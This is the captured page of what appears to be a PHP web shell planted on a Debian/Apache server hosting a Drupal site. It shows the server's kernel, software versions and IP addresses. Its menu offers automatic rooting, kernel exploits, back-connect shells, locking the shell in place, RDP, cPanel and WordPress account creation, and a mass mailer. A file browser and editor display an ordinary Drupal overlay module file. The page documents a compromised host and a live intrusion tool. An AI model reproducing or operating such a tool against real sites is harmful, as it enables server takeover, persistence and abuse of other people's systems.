Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.12.153.240
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
overlay /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
overlay-child-rtl.css
571
B
-rw-r--r--
overlay-child.css
3.27
KB
-rw-r--r--
overlay-child.js
6.54
KB
-rw-r--r--
overlay-parent.css
1.1
KB
-rw-r--r--
overlay-parent.js
37.55
KB
-rw-r--r--
overlay.api.php
1.03
KB
-rw-r--r--
overlay.info
261
B
-rw-r--r--
overlay.install
480
B
-rw-r--r--
overlay.module
35.14
KB
-rw-r--r--
overlay.tpl.php
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : overlay.api.php
<?php /** * @file * Hooks provided by Overlay module. */ /** * @addtogroup hooks * @{ */ /** * Allow modules to act when an overlay parent window is initialized. * * The parent window is initialized when a page is displayed in which the * overlay might be required to be displayed, so modules can act here if they * need to take action to accommodate the possibility of the overlay appearing * within a Drupal page. */ function hook_overlay_parent_initialize() { // Add our custom JavaScript. drupal_add_js(drupal_get_path('module', 'hook') . '/hook-overlay.js'); } /** * Allow modules to act when an overlay child window is initialized. * * The child window is initialized when a page is displayed from within the * overlay, so modules can act here if they need to take action to work from * within the confines of the overlay. */ function hook_overlay_child_initialize() { // Add our custom JavaScript. drupal_add_js(drupal_get_path('module', 'hook') . '/hook-overlay-child.js'); } /** * @} End of "addtogroup hooks". */
Close